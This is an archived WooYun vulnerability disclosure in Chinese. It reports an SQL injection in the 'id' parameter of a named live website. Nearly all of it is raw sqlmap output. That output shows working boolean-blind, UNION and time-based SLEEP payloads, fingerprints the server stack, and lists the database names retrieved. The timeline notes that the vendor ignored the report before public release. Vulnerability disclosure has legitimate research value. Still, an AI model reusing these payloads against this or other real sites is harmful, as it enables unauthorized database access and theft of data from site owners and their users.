乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-04: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-03-21: 厂商已经主动忽略漏洞,细节向公众公开
某处存在SQL注入,可以直接获取数据库信息!
注入地址:http://www.barcodebm.com/content.php?id=213sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection points with a total of 34 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=213 AND 1630=1630 Type: UNION query Title: MySQL UNION query (NULL) - 12 columns Payload: id=-3889 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x3a6771753a,0x74646b564d4344535462,0x3a6a70693a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=213 AND SLEEP(5)---[19:34:12] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17back-end DBMS: MySQL 5.0.11[19:34:12] [INFO] fetching database names[19:34:12] [INFO] the SQL query used returns 2 entries[19:34:13] [INFO] retrieved: "information_schema"[19:34:14] [INFO] retrieved: "bangma"available databases [2]:[*] bangma[*] information_schema[19:34:14] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.[19:34:14] [INFO] fetched data logged to text files under 'Z:\Hacker Tools\????\????\sqlmap\output\www.barcodebm.com'
Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=213 AND 1630=1630 Type: UNION query Title: MySQL UNION query (NULL) - 12 columns Payload: id=-3889 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x3a6771753a,0x74646b564d4344535462,0x3a6a70693a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=213 AND SLEEP(5)---
未能联系到厂商或者厂商积极拒绝